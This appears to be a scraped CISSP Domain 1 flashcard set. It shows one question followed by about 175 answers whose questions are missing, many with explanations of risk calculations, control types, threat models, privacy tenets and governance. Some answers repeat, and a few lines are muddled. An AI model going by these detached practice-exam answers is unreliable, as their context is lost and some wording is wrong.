CISSP-P1 Flashcards

Question

Formula for total risk A. Threats * Vulnerabilities * asset value B. Threats * Vulnerabilities * ALE

Answer 1

Quantitative

Answer 2

Inventory assets (AV) Identify Threats (calculate EF and SLE) Perform a threat analysis (ARO) Estimate the potential loss (ALE) Research countermeasures for each threat Perform a cost benefit analysis

Answer 3

Qualitative

Answer 4

False Watch that decimal!

Answer 5

True the control cannot cost more than the value of the safeguard, is the safeguard cost effective?

Answer 6

STRIDE - Microsoft threat modeling tool Spoofing Tampering Repudiation - attacker can deny participation Information disclosure Denial of service Elevation of privilege

Answer 7

Stage Six: Attack Analysis Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 8

Stage Three: Decompose the Application Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 9

Stage One: Define the Objectives Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 10

Stage Two: Define the Technical Scope Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 11

Stage Four: Analyze the Threats Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 12

Stage Five: Vulnerability Analysis Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 13

Stage Seven: Risk and Impact Analysis Stage One: Define the Objectives Stage Two: Define the Technical Scope Stage Three: Decompose the Application Stage Four: Analyze the Threats Stage Five: Vulnerability Analysis Stage Six: Attack Analysis Stage Seven: Risk and Impact Analysis

Answer 14

Memorize A requirements model

Answer 15

Administrative (also called directive)

Answer 16

Preventive

Answer 17

Corrective

Answer 18

Compensating

Answer 19

Criminal law

Answer 20

Administrative law

Answer 21

Computer Fraud and Abuse Act

Answer 22

Federal Sentencing Guidelines

Answer 23

Federal Information Security Management Act (FISMA)

Answer 24

Copyright and the Digital Millennium Copyright Act

Answer 25

Trade secrets

Answer 26

Real Evidence

Answer 27

Direct evidence

Answer 28

Circumstantial evidence

Answer 29

Corroborative evidence

Answer 30

Hearsay evidence

Answer 31

Secondary evidence

Answer 32

Protection of intellectual property

Answer 33

The recovery point objective is not a preference The Maximum Allowable Downtime (MAD) also known as the Maximum Tolerable Downtime (MTD), and also a Maximum Allowable Outage (MAO) is the amount of time that the business can be disrupted before the organization dies. The Recovery Time Objective (RTO) is the target time set for recovering from an interruption. The recovery point objective (RPO) is how much data can be lost before the organization dies.

Answer 34

The Exposure Factor of a single loss in relation to the total of all asset values This question is looking to see if you know the difference between AF, EF, ALE, ARO, and SLE in a non-standard context. EF in the context of the available choices would be 20K divided by 5 million, not 240,000 divided by 60 million. Try to ignore the additional information that was intentionally thrown into the options (“in relation to…”)

Answer 35

The exploitation of a vulnerability Vulnerability is a weakness, or lack of a safeguard. A safeguard is a control; a threat is something that can take advantage of the vulnerability.

Answer 36

The employee should not have this many job duties unless they are clearly articulated in the job description. Least privilege has to do with access. While the other responses are good, the MOST correct statement is that he shouldn’t have such duties unless they are articulated in his job description.

Answer 37

The asset values contained therein might be nominal values to one particular area Ideally the BIA will contain mostly accurate asset values rather than nominal values that one particular area of the business presumes.

Answer 38

Training seeks to educate, awareness seeks to remind As presented in Domain 1, education is more formal, offered by an accredited organization and results in a degree or certification. This can be through an accredited college, or official training program. Training is semi-formal, typically offered by employers, it can be documented & tracked, occurs during employment, and may be required by law or industry/regulator policy. Awareness is the effort to make employees aware of security requirements. It is informal, unscheduled, not required, and consists of reminders and encouragement, typically in the form of email reminders, security posters, team meeting discussions, conference call presentation, in-person presentations and guest speaker presentations.

Answer 39

The import/export of cryptographic software and hardware

Answer 40

Conducting dictionary attacks on competitor website accounts at work; this type of attack is documented as part of your job duties under the category of “ethical hacking activities” to conduct on your company’s website. According to the ISC2 code of conduct, the (ISC)2 member is expected to do the following:  1. Protect society, the common good, necessary public trust and confidence, and the infrastructure. 2. Act honorably, honestly, justly, responsibly, and legally. 3. Provide diligent and competent service to principals. 4. Advance and protect the profession. If your activities are not authorized you would be violating the second and third tenets of the code of conduct (acting justly and legally responsible; providing diligent and competent service). Conducting dictionary attacks on competitor websites would violate these tenets (because it is not authorized by your job description).

Answer 41

Free to use including any modifications but support and extra features are not free

Answer 42

Mitigate, accept, transfer, abandon the activity Abandon the activity” is the same as to avoid the risk. If you struggled with this question.

Answer 43

Accountability Accountability is not a tenet of privacy law, however it does apply to data ownership responsibility.

Answer 44

Work factor in breaking the algorithm

Answer 45

Procedures ensure that tasks are performed according to standards Knowledge needed: Candidates need to be aware of the difference between policies, standards, procedures, and guidelines. Policy – should have the following components: -High level overview of security strategy or goals -Contains data classifications (confidential, sensitive, etc.) -Type of access management (whether role-based, etc.) -Expected user behavior with the entity’s IT systems and data -High level personnel security practices, such as background checks Standard – should have the following elements: -Can come from statutory/administrative law, professional organizations, or industry groups -Describes settings, expectations of performance, configurations, specific requirements Guidelines – contain recommendations and suggestions, but they are not required. Procedures – contain specific, repeatable steps; very task-oriented.

Answer 46

That the company could be liable under the prudent person rule. Explanation: This question may be especially challenging since it has multiple correct or incorrect answers, depending on how you interpret it. The best approach with questions like this is to rate each response according to which one would be better than the other. Whichever response has the better rating should be the answer you select. Knowledge needed: Due diligence involves the research and preparation, whereas due care (aka “prudent person”) applies to the actions afterward. This would not constitute a security incident (however it could lead to a security incident). Not applying the selected security framework could make the company liable under the prudent person rule. There is no such thing as due practice.

Answer 47

The recovery time objective must be less than the maximum allowable downtime RTO is a preference, MAD cannot be exceeded, otherwise the business cannot continue.

Answer 48

Part of training & awareness Knowledge needed: Awareness is the effort to make employees aware of security requirements. It is informal, unscheduled, not required, and consists of reminders and encouragement, typically in the form of email reminders, security posters, team meeting discussions, conference call presentation, in-person presentations and guest speaker presentations. Policy – should have the following components: 1. High level overview of security strategy or goals 2. Contains data classifications (confidential, sensitive, etc.) 3. Type of access management (whether role-based, etc.) 4. Expected user behavior with the entity’s IT systems and data 5. High level personnel security practices, such as background checks Procedures contain specific, repeatable steps; very task-oriented. Standards should have the following elements: 1. Can come from statutory/administrative law, professional organizations, or industry groups 2. Describes settings, expectations of performance, configurations, specific requirements Guidelines – contain recommendations and suggestions, but they are not required.

Answer 49

The results of a financial audit that are not current The type of opinions is irrelevant when conducting surveys in a BIA. An old financial audit does not capture variances in the asset values, thus would not be used as input for a BIA.

Answer 50

None of the above Correct all of these are intellectual property

Answer 51

Ensuring that the critical path continues despite or without disruption Correct Critical path is synonymous with mission criticality. Profits may or may not be part of the critical path. The other two options are not optimal because they are concerned with management decisions and recovery rather than continuity.

Answer 52

The data can be shared with others Explanation: This question may be especially challenging since it asks the question in roundabout way. These questions are presented with statements like “which of the following is NOT”, which is misleading for those of us who are quick readers. The best approach with questions like this is to rephrase the question in your mind, and turn it into something like “all of these are good options EXCEPT” and then find the choice that doesn’t fit. Knowledge needed: Dissemination refers to the tenet that data should not be shared with others. Here is the mnemonic to use that can help memorize the general privacy tenets presented in the Common Body of Knowledge, but keep in mind ISC2 has added the GDPR privacy tenets as well, which are slightly different. Here is the mnemonic for the general tenets: “PLS (please) Acquire or Reveal Some DoNuts”. These are intentionally out of order from your book(s) to make memorization easier: 1. Participation – the data subject should have the option to opt in or opt out. 2. Limitation – data can only use it for the purpose stated. 3. Scope – there must be a specific purpose (and it must be legal/ethical), the scope should be include in the notification. 4. Accuracy – the data must be as accurate as possible, and the data subject should be able to make corrections. 5. Retention – the data should be kept only as long as it’s needed. 6. Security – the custodian must protect the data. 7. Dissemination – the custodian must not share the data without notifying the data subject. 8. Notification – must notify the user that you’re collecting and creating their data before it’s used, should include purpose of use

Answer 53

Single loss expectancy Correct Explanation: This question may be especially challenging since it contains irrelevant information. The best approach with questions like this is to take your time in reading the question and available responses a few times to identify the irrelevant information. This will help you to understand what the question is really asking. Knowledge needed: Single loss expectancy is the correct answer since this is a dollar amount (20,000 x 12). The Risk Measurement Model from Domain 1 is outdated according to ISC2 and is based on a physical security model, but they are still holding tight to these concepts. Asset Value (AV) is of course the asset’s value, exposure factor (EF) is the percent of the asset that can be lost from a certain event, single loss expectancy (SLE) is the AV x the EF, measured in money; the annual rate of occurrence (ARO) is how many times in a year the event occurs, typically a decimal but it can be more; the Annual loss expectancy (ALE) is the SLE x ARO, which shows how much the business is currently losing without implementing safeguards. If the safeguards are cheaper than the ALE, it’s best to implement the safeguards.

Answer 54

The alert is a compensating control in the absence of other controls. Incorrect Compensating controls only exist in the absence of other, more efficient controls.

Answer 55

The annualized rate of earthquake occurrence for the area This question may be especially challenging since it takes concepts from the Common Body of Knowledge and applies them to a realistic scenario. The best approach with questions like this is to try and identify which concept you are being quizzed on, which you can do by reading both question and available options slowly. It may take several times before you fully understand what the question is asking. Try not to rush in the real exam, and be patient with yourself. Knowledge needed: The Risk Measurement Model from Domain 1 is outdated according to ISC2 and is based on a physical security model, but they are still holding tight to these concepts. Asset Value (AV) is of course the asset’s value, exposure factor (EF) is the percent of the asset that can be lost from a certain event, single loss expectancy (SLE) is the AV x the EF, measured in money; the annual rate of occurrence (ARO) is how many times in a year the event occurs, typically a decimal but it can be more; the Annual loss expectancy (ALE) is the SLE x ARO, which shows how much the business is currently losing without implementing safeguards. If the safeguards are cheaper than the ALE, it’s best to implement the safeguards.

Answer 56

Regulatory mandates do not have financial incentives This is a convoluted way of saying that contractual mandates do have financial incentives.

Answer 57

A work that is given by the author into the public domain Correct Public domain works, as long as they are given as such by the creator, are not considered intellectual property and do not need to be protected.

Answer 58

Rate of annualized occurrence Correct This question is looking to see if you know the difference between AF, EF, ALE, ARO, and SLE. While this is not worded exactly correct, ARO is the correct answer even though it rearranges the words to throw you off.

Answer 59

Password requirements for the company’s systems Password requirements for systems are typically part of requirements identified during the SDLC. All other options would be included in the policy even though they are worded slightly different than your book may have presented them.

Answer 60

The asset values contained therein might be nominal values to one particular area This question may be especially challenging since it does not have enough information to make a good choice with the available options (the question is vague or ambiguous). The best approach with questions like this is to either think through the process to what the eventual outcome or missing component might be, or to give the available options a rating to see which one is CLOSEST to being the right answer. Knowledge needed: Ideally the BIA will contain mostly accurate asset values rather than nominal values that one particular area of the business presumes.

Answer 61

Procedures ensure that tasks are performed according to standards Knowledge needed: Candidates need to be aware of the difference between policies, standards, procedures, and guidelines. Policy – should have the following components: -High level overview of security strategy or goals -Contains data classifications (confidential, sensitive, etc.) -Type of access management (whether role-based, etc.) -Expected user behavior with the entity’s IT systems and data -High level personnel security practices, such as background checks Standard – should have the following elements: -Can come from statutory/administrative law, professional organizations, or industry groups -Describes settings, expectations of performance, configurations, specific requirements Guidelines – contain recommendations and suggestions, but they are not required. Procedures – contain specific, repeatable steps; very task-oriented.

Answer 62

Code of ethics While this is a specific directive, you have to think about where it would fit within the given options (don’t assume too much) – in this case an organizational code of ethics would be the best fit.

Answer 63

Exposure factor from an earthquake ALE is the amount of loss the company currently experiences, single loss expectancy is the loss from a single instance, and annualized cost of mitigation is not a concept in the CBK.

Answer 64

Executives who are not directly interacting with staff carrying out the program While many organizations state that all employees are responsible, such a directive can only come from executive management.

Answer 65

The fence is a compensating control. Since the lack of a guard is a vulnerability, the other controls are compensating.

Answer 66

The mannequin is a deterrent control This question tries to confuse you with too much information in the beginning. Since the lack of a guard is a vulnerability, the mannequin would deter an attacker from breaking in.

Answer 67

The process of how an organization is managed

Answer 68

Take a subjective approach to risk analysis “Subjective” means that something is based on opinions or feelings, and is the description of “qualitative”. This is the best approach due to the lack of numeric values and un-quantifiable metrics.

Answer 69

Recovery steps to the alternate site within the recovery time objective Alternate site (could be warm or cold) within the RTO is the best choice here, given that we don’t have more details. The other options mix terminology to confuse you. A hot site is the same as mirror.

Answer 70

Purchase insurance if the annualized loss expectancy for each boat exceeds the cost of the annualized rate of insurance. Remember that the ALE is what’s currently being experienced, thus the cost to transfer the risk (insurance) must be less than the ALE.

Answer 71

All staff at one location can use the software, regardless of the number

Answer 72

Business impact analysis

Answer 73

Embedded security games within the training that feed user scores into a separate data analytics system. One of the key words in this question is “evaluating”. Hold on to that word as you read through the options to determine which of the options is the best option. While the question itself doesn’t ask you to find the “best option”, you should assume that’s the case with all questions. Gamification, while fun and engaging, is useless in evaluating the training’s effectiveness unless scores can be viewed and evaluated by management.

Answer 74

The security officer conducting in-person training to board members This is almost a giveaway question, but could be challenging since it presents real-world scenarios. If you understand what governance is, the key word “decision” should stand out in all the options here. Also, note how the question uses the phrase “is not”, in which case you should, by now, be able to flip the wording in your mind by saying “all of these are examples EXCEPT…” and hopefully arrive at the right answer.

Answer 75

Unrealistic vulnerability identifications, standard compensating controls that prevent future loss expectancy capabilities, and more emphasis on application security This is part of the CBK that is hidden within the pages of the risk management module. Pay special attention to these sections as they often have important information for the exam.

Answer 76

Potential impact to organizational assets Ambiguous questions can be difficult. Two key words are “performed” and “considered” – management decisions have already been made if you are “performing” pentest activities. Make sure you understand the question completely before choosing an answer.

Answer 77

A support function Remember that the purpose of security is to support the organizational mission/goals.

Answer 78

Security governance "Security decisions"

Answer 79

The process of how a decision is made

Answer 80

Employment agreements Since the third-party is not an employee, an employment agreement would not apply to this situation.

Answer 81

Process-based Knowledge needed: Safety critical activities can frequently be the focus of process-based risk perspectives. As the title suggests, processes are the primary focus of process-based risk analysis.

Answer 82

Senior management Line supervisors are typically concerned with day-to-day supervision tasks, whereas functional management has a better perspective on what the asset values might be. Senior and Executive management would make the final decision while taking into consideration the input of functional management

Answer 83

Humidified areas in a data center Again when questions contain “not”, be sure to re-write them in your mind to something like “These are all physical vulnerabilities EXCEPT”… at which point the question should become easier.

Answer 84

Due diligence Remember that due diligence is doing the pre-decision work, or the research; whereas due care is the action, or the decision piece. In the context of this question, purchasing the services of the best and most compliant vendor would be practicing due care.

Answer 85

An e-commerce web application that collects individual's names, shipping/billing address, and credit card information. Data minimization principle of GDPR stipulates that data collected must be limited to the minimum amount of data necessary for the specified purpose.

Answer 86

Lack of encryption for data at rest; with an organizational viewpoint that more can always be done This question combines the concepts of professional ethics and risk maturity from Domain 1 in a vague fashion. Continuous improvement is a philosophy in the ISO 27,000 Family of Standards. It claims that “enough” implementation does not really exist, thus the assumption is that no matter what you do you can always do more. Security management is process, not a goal or task with a definable end date.

Answer 87

Unilateral NDA Unilateral refers to a one-way disclosure agreement.

Answer 88

It may have a negative impact on operations

Answer 89

Simulation Simulation provides numbers, samples, and data points as a basis of risk before systems are built. If you struggled with this question, be sure to read up on simulation in Domain 1.

Answer 90

Attaining a level of control with the capability to destroy target data and systems. Vague options can be confusing. Rule out any options that contain information that is too specific, such as destruction of users, or allowing unauthorized users into the system. Elevating permissions may be tempting, but the key phrase in that option is too specific (allowing users into the system). While this could be part of the threat model, the STRIDE model is described at a higher-level in the Common Body of Knowledge.

Answer 91

An aspect of the code that does not create an exploitable vulnerability Double negatives can be tricky. Rephrase the question in your mind to “All of these are software vulnerabilities” and then find the one that isn’t. If there’s another negative in the answer/response, rephrase the response, in this case to read “An aspect of the code that prevented vulnerabilities”.

Answer 92

Factor analysis of information risk (FAIR) method The FAIR method uses straightforward, numeric, and simple ways to make most risk assessment tasks start out quantitative and stay that way.

Answer 93

Outcomes-based Outcomes-based risk approach identifies goals or objectives the company wants to achieve and links them to core business processes that make them happen.

Answer 94

Alert senior management so that a priority can be set on the risk, and request that a decision be made to mitigate, transfer, accept, or avoid the risk. Domain 1 of the revised Common Body of Knowledge (May 2021) brings a new update to the decision making process for risk. Each risk must have two decisions made before anything should be done to respond. 1) Prioritize 2) Choose one of the four decisions: mitigate, accept, transfer, avoid. Since the condensation is a risk and not an imminent threat (i.e. it’s not happening right now), the two decisions must be made before acting on it.

Answer 95

Administrative

Answer 96

Detective controls Detective controls identify or recognize malicious activity.

Answer 97

The decision to conduct backups A decision to conduct backups would most likely be considered part of the governance process and not a recovery control. The others are administrative, technical, preventative, and corrective controls (controls may fall into more than one category).

Answer 98

OCTAVE, Trike

Answer 99

Legal standards are based on court decisions; regulatory standards are mandates set by government agencies Comparison questions can be the trickiest. Be sure to focus on the question and what you know.

Answer 100

The handbook informs employees about expectations; the contract holds them accountable for behavior requirements

Answer 101

Encryption

Answer 102

A reduction in revenue Regulatory shutdown PCI DSS noncompliance results in loss of ability to process card payments, resulting in loss of sales or revenue.

Answer 103

Cryptographic services applied to informational assets by the security office staff who were intentionally left out of the recovery plan documentation Information security is a supporting function. One of the key words here is “critical”. Security staff may or may not be designated as critical path, however, such terminology can be thrown in just to confuse you.

Answer 104

The Scope tenet but lacking the Limitation tenet

Answer 105

Addressing many issues versus addressing a single issue Take your time with questions like these. When there is vague wording, look at the overall spirit of the question and pick “the best of the worst” since all of these options are poorly worded.

Answer 106

Limitation tenet

Answer 107

Quantitative risk analysis; consideration of compensating controls presented in the risk report

Answer 108

Notification tenet

Answer 109

Security Policy

Answer 110

Security Guideline

Answer 111

Participation tenet

Answer 112

A standard

Answer 113

Standards This is straight from the CBK. “Practices” typically represent what is currently being done, thus standards would be the best choice. Policy influences standards, which drive procedures, and guidelines are good ideas.

Answer 114

A vulnerability

Answer 115

Because guidelines might suggest it This question requires you to pay attention to the wording (as do all questions). It tests your knowledge of the difference between policy, procedures, guidelines, and regulation. The phrase “Take into consideration” is the giveaway – guidelines are suggestions and not required. All other options would be some type of requirement.

Answer 116

Standard The document is a standard because it represents an overview of a process rather than specific steps.

Answer 117

Codifying the performance expectations through an employment contract Since contracts are legally enforceable, this is the best option.

Answer 118

Policy, standard, guideline

Answer 119

Both are decisions; one addresses consequences and the other addresses preventing the consequences

Answer 120

Because it could impact availability and could be related to a security incident This question tests your knowledge of the difference between the CIA tenets of information security from Domain 1.

Answer 121

An administrative control The key concept is that the organization did something before hiring you, which is an administrative control no matter how you might feel about it or what the laws might be in your area. It would not be considered a procedure because the question does not mention any referencing of a document.

Answer 122

Review looks at inputs, evaluation looks at outputs This question tries to confuse you with vague wordings. Inputs for training/awareness might be a vague way of indicating the content and what’s driving the content, whereas output refers to the efficacy of the program. Evaluation is the formal process.

Answer 123

If the TLS accelerator fails, then traffic may be unencrypted; consider implementing a redundant accelerator This question tests your ability to filter out key terms that are used incorrectly, to identify the vulnerability, and to pay attention to wording. The reference to “availability” might have been the most tempting, but pay special attention to the word “either” which means that if one OR the other fails (not both, in which case redundant web servers would be the correct answer).

Answer 124

Security awareness training that covers social engineering The key word here is “tricked,” which means that social engineering has occurred, and the best preventive measure would be appropriate security awareness training. Phishing is a type of social engineering, and since we don’t know the method of trickery, security awareness training that covers social engineering is the best response.

Answer 125

A hybrid standard/guideline

Answer 126

Contingency is critical, continuity is normal The key word is “critical”. Contingency is concerned with critical operations. While poorly worded, you may see questions like this in the exam that seek to confuse you (aka: test your knowledge).

Answer 127

A group of mid-to-high ranking employees who meet regularly to discuss security policies, roles, and processes used to make security decisions The term “governance” is used in the available responses to tempt you into selecting the wrong answer. Notice that one group is focused on security incidents, another is concerned with overall processes/procedures, and another is concerned with carrying out the governance directives. These can all be ruled out.

Answer 128

Program effectiveness evaluation This is the updated terminology used for a security education training & awareness program in Domain 1.

Answer 129

Degradation of service attack This could be a type of beta question that uses terminology not necessarily covered in the CBK. The key word in this question (not that they all have key words) is “occasionally”, which indicates that the attack is not continuous – in combination with the fact that login is taking five to ten minutes (as opposed to never) indicates this is a degradation, not a denial.

Answer 130

Poor personnel screening practices This question is vague but seeks to test your knowledge about what category background checks and reference checks fit into. When an option is as vague as “poor judgment”, you can instantly rule it out. Also while high-level options (such as hiring practices) might seem good, the exam is testing you on specific concepts presented in the CBK.

Answer 131

Governance

Answer 132

Staff using write-block technology to conduct forensics on suspicious devices Investigative processes are detective controls, which can sometimes be technical as well, but not in this case.

Answer 133

Investigative standards most likely do not exist to guide the security manager Since the procedures do not exist and the manager already has the appropriate knowledge, focus on what may be missing from this equation and look back to your lesson on the difference between policy, standard, guideline and procedure. In questions like this, not everything will be spelled out perfectly for you, and you may need to make some assumptions using the knowledge you gained from studying the CBK. As always, go with the best of the worst options.

Answer 134

Licensing and continuous audit trails Ultimately this question tests your knowledge about digital rights management solutions. Since very little information is given, you have to look for key words and make assumptions (e.g. dynamic policy control).

Answer 135

Recovery steps and objectives to the alternate site While short and vague, this question tests your knowledge between terminology from the Security Operations and Security Risk Management domains – the many “Rs” (remediation, response, recovery, etc.) can be confusing when not presented in the context of their respective domains. Be sure to study up on contingency planning and incident management if you missed this question.

Answer 136

In its governance Vague wording is used in this question. Governance is the best answer because it takes into consideration all the policies, standards, and handbooks from the company.

Answer 137

Implement the weaker framework In difficult ethical questions like this, pay attention to wording. One key word is “could”, meaning it’s unknown whether the company would be out of compliance. Also, keep in mind that nothing in this question ties the two incidents together (weak framework and being laid off). In addition, remember that security is a supporting function that must align with organizational goals.

Answer 138

Subjective “Subjective” is the same as qualitative. Since metrics are missing, this is the best option.

Answer 139

Legal standard This question tests your knowledge of the difference between legal, regulatory, and industry standards. The key word here is “court ruling”.

Answer 140

Likelihood This is a vague question, but remember that likelihood is the measure of possibility. If the possibility is increasing, the likelihood is increasing.

Answer 141

The protocol document should be followed. Given that one of the options talks about “guidelines”, you might be able to decipher that this question is talking about the difference between policy, procedures, standards, etc. Also, given that none of these answers are perfect, you have to choose the best one, which is usually the higher level option since a protocol (policy/standard) would overrule a runbook (procedure). Thesaurus and non-CBK terms are commonly inserted into questions to test your ability to apply the knowledge and ability to wade through challenges.

Answer 142

Educate the board members on how to submit a complaint to internal affairs. In ethical dilemma questions, pay attention to the wording and when in doubt, the best approach is to look for established processes/procedures that can be followed. Also try to ignore irrelevant information within the question, such as the number of board members, and their lack of knowledge. Since each of the available options has an inherent assumption (which will make you uncomfortable during the exam), you have to choose the BEST one.

Answer 143

Interruptions to service must not exceed 3 seconds. Interruptions beyond this SLAs need to have a measurable and financially/legally enforceable metric. While some of these options have numeric metrics, they are not objective or reasonable, and could easily be disputed.

Answer 144

Guidelines When all of the answers are theoretically “correct”, try to choose the option that is the least correct. In this case, since guidelines are recommendations, they would be the least correct out of the options presented here.

Answer 145

They should be considered for implementation through the regular change process. While the options available are vague and poorly worded, look for key words that can help you focus on the bottom line and rule out the bad options. Ultimately this question asks what the difference is between policy and guideline. If you remember that guidelines are simply suggestions, then this question becomes fairly easy. If a change complies with policy then it should be considered through the normal process.

Answer 146

Administrators have impersonator accounts where logging is written as the impersonated user. This question is vague, and has multiple right answers, but the best choice is the one in which the employee would have the “most” repudiation. Remember that repudiation is the ability to deny, so in the case where an “impersonator” account exists, the admin remains completely anonymous and users can deny all actions performed under their accounts.

Answer 147

Request copies of third-party audit results. When all of the options seem good, you have to use the process of elimination to weed out the worst options. When ruling out options, re-read the question multiple times, especially if the question is short. In this case since we don’t know what’s in the contract or what the regulations allow, conducting an audit is out of the question, and looking at the contract won’t do any good other than adding to your knowledge. Elevating the issue might be good, but the CBK specifically mentions reviewing audit results for organizations that are subject to the same regulations. Be sure to review risk management concepts in Domain 1 if you struggled with this question.

Answer 148

Role-based access controls and user monitoring This question requires you to think through each option, what they might do as a combination, and how they might complement each other as a layered defense architecture. In this case, the only two that would provide sufficient layered defense would be RBAC and monitoring, because it presents a technical control and administrative/management control combination. The remaining options are good but not the best (remember to always choose the “best” option).

Answer 149

Access control systems Standards, procedures, and policy dictate the rules, but systems or processes enforce them.

Answer 150

1. C. A company can have one specific data owner or different data owners who have been delegated the responsibility of protecting specific sets of data. One of the responsibilities that goes into protecting this information is properly classifying it

Answer 151

C. If data is going to be available to a wide range of people, more granular security should be implemented to ensure that only the necessary people access the data and that the operations they carry out are controlled. The security implemented can come in the form of authentication and authorization technologies, encryption, and specific access control mechanisms.

Answer 152

3. B. The best answer to this question is B, because to properly classify data, the data owner must evaluate the availability, integrity, and confidentiality requirements of the data. Once this evaluation is done, it will dictate which employees, contractors, and users can access the data, which is expressed in answer A. This assessment will also help determine the controls that should be put into place.

Answer 153

4. D. The key to this question is the use of the word “ultimately.” Though management can delegate tasks to others, it is ultimately responsible for everything that takes place within a company. Therefore, it must continually ensure that data and resources are being properly protected.

Answer 154

5. A. Without senior management’s support, a security program will not receive the necessary attention, funds, resources, and enforcement capabilities.

Answer 155

6. D. Companies may decide to live with specific risks they are faced with if the cost of trying to protect themselves would be greater than the potential loss if the threat were to become real. Countermeasures are usually complex to a degree, and there are almost always political issues surrounding different risks, but these are not reasons to not implement a countermeasure.

Answer 156

7. B. Although the other answers may seem correct, B is the best answer here. This is because a risk analysis is performed to identify risks and come up with suggested countermeasures. The ALE tells the company how much it could lose if a specific threat became real. The ALE value will go into the cost/benefit analysis, but the ALE does not address the cost of the countermeasure and the benefit of a countermeasure. All the data captured in answers A, C, and D are inserted into a cost/benefit analysis.

Answer 157

8. D. The ALE calculation estimates the potential loss that can affect one asset from a specific threat within a one-year time span. This value is used to figure out the amount of money that should be earmarked to protect this asset from this threat.

Answer 158

9. C. The functionality describes how a mechanism will work and behave. This may have nothing to do with the actual protection it provides. Assurance is the level of confidence in the protection level a mechanism will provide. When systems and mechanisms are evaluated, their functionality and assurance should be examined and tested individually.

Answer 159

10. D. The equation is more conceptual than practical. It is hard to assign a number to an individual vulnerability or threat. This equation enables you to look at the potential loss of a specific asset, as well as the controls gap (what the specific countermeasure cannot protect against). What remains is the residual risk, which is what is left over after a countermeasure is implemented

Answer 160

11. C. An analysis is only as good as the data that go into it. Data pertaining to risks the company faces should be extracted from the people who understand best the business functions and environment of the company. Each department understands its own threats and resources, and may have possible solutions to specific threats that affect its part of the company.

Answer 161

12. C. A quantitative risk analysis assigns monetary values and percentages to the different components within the assessment. A qualitative analysis uses opinions of individuals and a rating system to gauge the severity level of different threats and the benefits of specific countermeasures.

Answer 162

13. D. During a risk analysis, the team is trying to properly predict the future and all the risks that future may bring. It is somewhat of a subjective exercise and requires educated guessing. It is very hard to properly predict that a flood will take place once in ten years and cost a company up to $40,000 in damages, but this is what a quantitative analysis tries to accomplish.

Answer 163

14. D. The Control Objectives for Information and related Technology (CobiT) is a framework developed by the Information Systems Audit and Control Association (ISACA) and the IT Governance Institute (ITGI). It defines goals for the controls that should be used to properly manage IT and ensure IT maps to business needs.

Answer 164

15. A. CobiT has four domains: Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and Evaluate. Each category drills down into subcategories. For example, Acquire and Implement contains the following subcategories: * Acquire and Maintain Application Software * Acquire and Maintain Technology Infrastructure * Develop and Maintain Procedures * Install and Accredit Systems * Manage Changes

Answer 165

16. A. It is referred to as the health informatics, and its purpose is to provide guidance to health organizations and other holders of personal health information on how to protect such information via implementation of ISO/IEC 27002.

Answer 166

17. B. COSO deals more at the strategic level, while CobiT focuses more at the operational level. CobiT is a way to meet many of the COSO objectives, but only from the IT perspective. COSO deals with non-IT items also, as in company culture, financial accounting principles, board of director responsibility, and internal communication structures. Its main purpose is to help ensure fraudulent financial reporting cannot take place in an organization

Answer 167

18. B. NIST 800-30 Risk Management Guide for Information Technology Systems is a U.S. federal standard that is focused on IT risks. OCTAVE is a methodology to set up a risk management program within an organizational structure. AS/NZS 4360 takes a much broader approach to risk management. This methodology can be used to understand a company’s financial, capital, human safety, and business decisions risks. Although it can be used to analyze security risks, it was not created specifically for this purpose.

Answer 168

19. D. Security through obscurity is not implementing true security controls, but rather attempting to hide the fact that an asset is vulnerable in the hope that an attacker will not notice. Security through obscurity is an approach to try and fool a potential attacker, which is a poor way of practicing security. Vulnerabilities should be identified and fixed, not hidden.

Answer 169

20. B. Physical controls are security mechanisms in the physical world, as in locks, fences, doors, computer cages, etc. There are three main control types, which are administrative, technical, and physical.

Answer 170

21. A. Logical (or technical) controls are security mechanisms, as in firewalls, encryption, software permissions, and authentication devices.They are commonly used in tandem with physical and administrative controls to provide a defense-in-depth approach to security.

Answer 171

22. A. $62,000 is the correct answer. The firewall reduced the annualized loss expectancy (ALE) from $92,000 to $30,000 for a savings of $62,000. The formula for ALE is single loss expectancy × annualized rate of occurrence = ALE. Subtracting the ALE value after the firewall is implemented from the value before it was implemented results in the potential loss savings this type of control provides.

Answer 172

23. D. –$3,000 is the correct answer. The firewall saves $62,000, but costs $65,000 per year. 62,000 – 65,000 = –3,000. The firewall actually costs the company more than the original expected loss, and thus the value to the company is a negative number. The formula for this calculation is (ALE before the control is implemented) – (ALE after the control is implemented) – (annual cost of control) = value of control.

Answer 173

24. D. Risk mitigation involves employing controls in an attempt to reduce the either the likelihood or damage associated with an incident, or both. The four ways of dealing with risk are accept, avoid, transfer, and mitigate (reduce). A firewall is a countermeasure installed to reduce the risk of a threat.

Answer 174

25. B. $480,000 is the correct answer. The formula for single loss expectancy (SLE) is asset value × exposure factor (EF) = SLE. In this situation the formula would work out as asset value ($800,000) × exposure factor (60%) = $480,000. This means that the company has a potential loss value of $480,000 pertaining to this one asset (facility) and this one threat type (fire).

Answer 175

26. C. The annualized rate occurrence (ARO) is the frequency that a threat will most likely occur within a 12-month period. It is a value used in the ALE formula, which is SLE × ARO = ALE.

Answer 176

